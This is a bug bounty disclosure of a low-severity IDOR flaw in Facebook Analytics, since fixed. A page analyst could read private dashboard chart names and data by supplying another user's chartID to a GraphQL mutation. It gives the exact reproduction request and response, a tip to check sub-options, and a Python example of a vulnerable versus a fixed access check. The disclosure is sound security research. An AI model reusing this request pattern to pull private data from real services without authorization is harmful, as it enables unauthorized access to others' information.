Sarmad Hassan

Published On: 07 May 2020

Disclose Private Dashboard Chart's name and data in Facebook Analytics

IDOR
Facebook | Web
---
LOW VALID

In Facebook Analytics, you can create custom dashboards, which you can view from Dashboards. Use custom dashboards to create a customized view, or to see the information that matters to you most in one place. You can also set a dashboard's visibility by ticking the "Private" check mark, which means only the owner of that dashboard can see it and its contents.

Description

It is possible to disclose the chart name and chart data of a private dashboard to any user who holds a role on the entity or page (for example, the analyst role), using an IDOR bug in the parameter called "chartID".

Impact

Page analyst could view analytics charts where the page admin had set the visibility to "owner only".




Reproduction Steps

Step 1

POST /graphql?locale=user HTTP/1.1
Host: graph.facebook.com

access_token=Analyst_ACCESS_TOKEN&fb_api_req_friendly_name=AnalyticsChartDeleteMutation&variables={"chartID":"admin private chart ID"}&doc_id=1297068037067230

Response:

{"data":{"node":{"__typename":"AnalyticsStoredAggregationChart","chartId":"admin private chart ID","chartType":"BREAKDOWN_TABLE","chartQueries":[{"__typename":"AnalyticsAggregationQuerySpec","aggregationMetric":"UNIQUE_USERS","aggregationMetricParams":[],"aggregationPeriod":"RANGE","breakdowns":["$fb.age"],"dateRange":{"type":"LAST_28_DAYS","since_iso_date":null,"until_iso_date":null},"displayName":null,"eventName":"fb_pages_post_reaction","orderingColumns":[],"orderingType":"DESCENDING","limit":0,"segment":{"__typename":"AnalyticsAdhocFilterSetListing","name":null,"serializedFilter":"{\"event_rules\":[],\"demographic_rules\":[],\"device_rules\":[],\"percentile_rules\":[],\"user_property_rules\":[],\"web_param_rules\":[]}","filter_json":"{}"},"tag":"CHART"}],"description":"","title":"private chart name","segmentBehavior":"USE_LOCAL","chartAnnotations":[],"errorBounds":[],"goal":null,"id":"id"}},"extensions":{"is_final":true}}

My Notes

* When it comes to logical bugs like IDOR, always check for sub-options, because developers sometimes protect only the main option and forget about the sub-option, just like in our case here, where "Chart info" was a sub-option of the main option "Dashboard".
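To show the sub-option gap concretely, here is an added example (not Facebook's code; all class, field and user names are assumed for illustration) that models a chart as a sub-resource of a dashboard and compares a resolver that checks only the caller's role on the entity against one that also enforces the parent dashboard's "Private" setting:

```python
from dataclasses import dataclass

@dataclass
class Dashboard:
    dashboard_id: str
    owner_id: str
    entity_id: str            # page or app the dashboard belongs to
    private: bool             # the "Private" check mark: owner-only

@dataclass
class Chart:
    chart_id: str
    dashboard_id: str         # parent whose visibility the chart inherits
    title: str

class Forbidden(Exception):
    pass

class AnalyticsStore:
    def __init__(self):
        self.dashboards, self.charts = {}, {}
        self.roles = set()    # (user_id, entity_id) pairs holding any role

    def _load(self, user_id, chart_id):
        chart = self.charts[chart_id]
        dash = self.dashboards[chart.dashboard_id]
        if (user_id, dash.entity_id) not in self.roles:
            raise Forbidden("no role on this entity")
        return chart, dash

    def resolve_chart_vulnerable(self, user_id, chart_id):
        # Checks only the entity role; the parent dashboard's visibility is
        # never consulted, so any analyst on the page can read a private chart.
        chart, _ = self._load(user_id, chart_id)
        return chart.title

    def resolve_chart_fixed(self, user_id, chart_id):
        # The sub-resource inherits its parent's rule: private => owner only.
        chart, dash = self._load(user_id, chart_id)
        if dash.private and dash.owner_id != user_id:
            raise Forbidden("chart belongs to a private dashboard")
        return chart.title

def build_sample_store():
    # Constructed sample data: "admin" owns a private dashboard on page1;
    # "analyst" holds a role on page1 but is not the owner.
    store = AnalyticsStore()
    store.roles.update({("admin", "page1"), ("analyst", "page1")})
    store.dashboards["d1"] = Dashboard("d1", "admin", "page1", True)
    store.charts["c1"] = Chart("c1", "d1", "private chart name")
    return store
```

The same parent-visibility check belongs on every chart-level operation (read, update, delete), not only on the dashboard listing that the UI gates.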



Timeline

* Sarmad, 17 Feb 2020: Initial Report
* Facebook, 26 Feb 2020: Report Triaged
* Facebook, 08 Mar 2020: Report Fixed
* Sarmad, 08 Mar 2020: Fix Confirmed
* Facebook, 02 Apr 2020: Bounty Awarded
